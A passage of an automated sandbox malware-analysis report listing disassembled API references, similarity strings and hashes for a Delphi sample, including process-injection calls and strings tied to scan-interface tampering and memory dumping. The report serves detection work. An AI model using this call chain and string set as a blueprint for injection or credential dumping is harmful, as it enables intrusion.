                                                                      • SetThreadContext.KERNEL32(00000000,02D17424,ScanBuffer,02D173A8,02CAA93C,ScanString,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,00000000,-00000008,02D174FC,00000004,02D17500), ref: 02CAA317
                                                                      • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02D17424,ScanBuffer,02D173A8,02CAA93C,ScanString,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,00000000,-00000008,02D174FC), ref: 02CAA324
                                                                        • Part of subcall function 02CA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,UacScan), ref: 02CA8960
                                                                        • Part of subcall function 02CA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA897A
                                                                        • Part of subcall function 02CA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize), ref: 02CA89B6
                                                                      Similarity
                                                                      • API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateCreateLoadProcProcessResumeUserWrite
                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                      APIs
                                                                        • Part of subcall function 02CA89D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                        • Part of subcall function 02CA8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CA8814
                                                                      • GetThreadContext.KERNEL32(00000000,02D17424,ScanString,02D173A8,02CAA93C,UacInitialize,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,UacInitialize,02D173A8), ref: 02CA9602
                                                                        • Part of subcall function 02CA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CA7A9F
                                                                      Similarity
                                                                      • API ID: AllocateContextCreateFreeLibraryMemoryProcessThreadUserVirtual
                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,02C96C14,02C90000,02CBE790), ref: 02C95925
                                                                      • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02C9593C
                                                                      • lstrcpynA.KERNEL32(?,?,?), ref: 02C9596C
                                                                      • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02C96C14,02C90000,02CBE790), ref: 02C959D0
                                                                      • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02C96C14,02C90000,02CBE790), ref: 02C95A06
                                                                      • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02C96C14,02C90000,02CBE790), ref: 02C95A19
                                                                      • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C96C14,02C90000,02CBE790), ref: 02C95A2B
                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C96C14,02C90000,02CBE790), ref: 02C95A37
                                                                      • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C96C14,02C90000), ref: 02C95A6B
                                                                      • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C96C14), ref: 02C95A77
                                                                      • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02C95A99
                                                                      Similarity
                                                                      • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                      • String ID: GetLongPathNameA$\$kernel32.dll
                                                                      APIs
                                                                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C95BE8
                                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C95BF5
                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C95BFB
                                                                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C95C26
                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C95C6D
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C95C7D
                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C95CA5
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C95CB5
                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C95CDB
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C95CEB
                                                                      Similarity
                                                                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      Similarity
                                                                      • String ID: 0
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PkGNG
                                                                      • API String ID: 0-263838557
                                                                      • Opcode ID: cd36fe8c387ca2855096d15b7bf2cfed8e34aa58cb0db234df7a19e6c716ea84
                                                                      • Instruction ID: e63918e968c58970a573a92add572ad8592a6fd27e509687731e6f325db61251
                                                                      • Opcode Fuzzy Hash: cd36fe8c387ca2855096d15b7bf2cfed8e34aa58cb0db234df7a19e6c716ea84
                                                                      • Instruction Fuzzy Hash: EE02ACB16046518BC358CF2EEC9063AB7E1AB8D311B44863EE495C7781EB75E922CB94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                       • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PkGNG
                                                                      • API String ID: 0-263838557
                                                                      • Opcode ID: 88b47d59bd8f9e39717b2a9a8c0dcea2e64fabbb26349240269cb2a589f8870d
                                                                      • Instruction ID: 4429f88121793219acf3a8786f5a51dc5cd39d693f93e2d83177a20e80e1bec0
                                                                      • Opcode Fuzzy Hash: 88b47d59bd8f9e39717b2a9a8c0dcea2e64fabbb26349240269cb2a589f8870d
                                                                      • Instruction Fuzzy Hash: 4CF17C756142548FC348CF1DE8A087BB3E5FB89311B440A2EF582C7391DB75EA16CB66
                                                                      APIs
                                                                      • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02C97FF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                       • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1705453755-0
                                                                      • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                      • Instruction ID: f5dc05d171a5afb494a09d4818163010e73222e059bb9be98a30ef1d6cd8dba8
                                                                      • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                      • Instruction Fuzzy Hash: 9E11D2B5E00209AF9B04CF99C881DBFF7F9FFC8300B54C569A509E7254E6719E018B90
                                                                      APIs
                                                                      • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C9A7E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                       • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                      • Instruction ID: a5a00b3ad1b1d3fac1b5e59262f478de2f334e0a9c62d7a79f3845242e0989fd
                                                                      • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                      • Instruction Fuzzy Hash: C1E0D87170021857DB15A5999C89EFA725D9B5C310F00427ABD05C7385EDF19E804AE8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                       • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PkGNG
                                                                      • API String ID: 0-263838557
                                                                      • Opcode ID: a138c4e0aeabb2bccdb66877e2b9435159f75a40726a9d3314504188017a6109
                                                                      • Instruction ID: 34c08f88578722725a410210327bab2a0febd45ba904af31008a545f09562c56
                                                                      • Opcode Fuzzy Hash: a138c4e0aeabb2bccdb66877e2b9435159f75a40726a9d3314504188017a6109
                                                                      • Instruction Fuzzy Hash: 57B1833911429A8ACB06EF68C4913F637A1EF6A300F4851B9EC9CCF756D3358906EB74
                                                                      APIs
                                                                      • GetVersionExA.KERNEL32(?,02CBD106,00000000,02CBD11E), ref: 02C9B79A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                       • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Version
                                                                      • String ID:
                                                                      • API String ID: 1889659487-0
                                                                      • Opcode ID: d70ef78b7f823bd151896926fefed92e6b1264d95701ca0589ae8b8f4c67619b
                                                                      • Instruction ID: 71184f86b8606b6bac7d28c1b5f185111c618c230e14f7018760250294ae260a
                                                                      • Opcode Fuzzy Hash: d70ef78b7f823bd151896926fefed92e6b1264d95701ca0589ae8b8f4c67619b
                                                                      • Instruction Fuzzy Hash: F4F03AB4904301AFD751DF28E44475577E9FB88B04F818E28E699D7B80E7399814CF62
                                                                      APIs
                                                                      • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02C9BE72,00000000,02C9C08B,?,?,00000000,00000000), ref: 02C9A823
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                       • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                      • Instruction ID: 60707f0edf806ad51fac04688bb5ece4106f0e462793faf24770e0bca300beb6
                                                                      • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                      • Instruction Fuzzy Hash: BBD05EB230E2602AAA10925B2D88D7B5AECCFC57A1F10403AF988C6141D6108C07DAB5
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                       • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LocalTime
                                                                      • String ID:
                                                                      • API String ID: 481472006-0
                                                                      • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                      • Instruction ID: 12a549942f90666c3f00c3f52a97a4d4b4a13f2810077b42fe959e74a46d8d1c
                                                                      • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                      • Instruction Fuzzy Hash: 7FA0125040482081894033180C0253430445910A20FD4874068F8402D0E92D01209093
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                       • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                      • Instruction ID: 6ba16d782d0234069ed0c2362209dd3523083aa74a3fb0a324a510a5cca1f3ee
                                                                      • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                      • Instruction Fuzzy Hash: 5E513525A007B4D7DF378568A5557BE2BCA9F01208FD80A19CC82CB791D7C9DE45CB62
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                       • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                      • Instruction ID: 58126480b2f926843e2622111efb88b208e12bdae38303aadb6be735dad59746
                                                                      • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                      • Instruction Fuzzy Hash: 7B5152A16046B497DF378D68B4547BE23CBDB42208FC80919DC869BB81D7D5EE41C7A2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                       • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                      • Instruction ID: fe9fe97029fae64295ddaaef3cb21eac4938b986b6450b136dcae405b6290f11
                                                                      • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                      • Instruction Fuzzy Hash: 38516C719112088BEB24CF69D98979EBBF4FB08318F24806BD459E7360D774A940CF94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                       • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                      • Instruction ID: 09bb4dad679b956c5703ed3d384991ad8b1c9777e8de9de31714e22f09e4fbd0
                                                                      • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                      • Instruction Fuzzy Hash: E241D4759187459FD340CF29C58061AFBE1FBD8318F649A1EF889A3350D776E982CA82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PkGNG
                                                                      • API String ID: 0-263838557
                                                                      • Opcode ID: 06bf94d5155a8a2c30d2bc687d89ecd79ca391a1084a8028b2ee8d7bca9a62ee
                                                                      • Instruction ID: d4be69216c38012e5358e8a6e7a505755607a7ebc13387c3a3c333f765071f4c
                                                                      • Opcode Fuzzy Hash: 06bf94d5155a8a2c30d2bc687d89ecd79ca391a1084a8028b2ee8d7bca9a62ee
                                                                      • Instruction Fuzzy Hash: B0E01231400228FBCF11AB14D908A593B6AEF44242F414864F809AA262CB75EE42CE90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7c4eddc6a5d0cdfec55971e2787b996e507c32f56da4d0f735c0f191235488fd
                                                                      • Instruction ID: 6c276b4edc6d9b94fcfd9389c74bf9a2e7449d079a46ec72207a1b348c4cb265
                                                                      • Opcode Fuzzy Hash: 7c4eddc6a5d0cdfec55971e2787b996e507c32f56da4d0f735c0f191235488fd
                                                                      • Instruction Fuzzy Hash: D6324831D29F414ED7239A34D826335A248AFB72C9F55D737E81AB5EA6FB29C4C38101
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
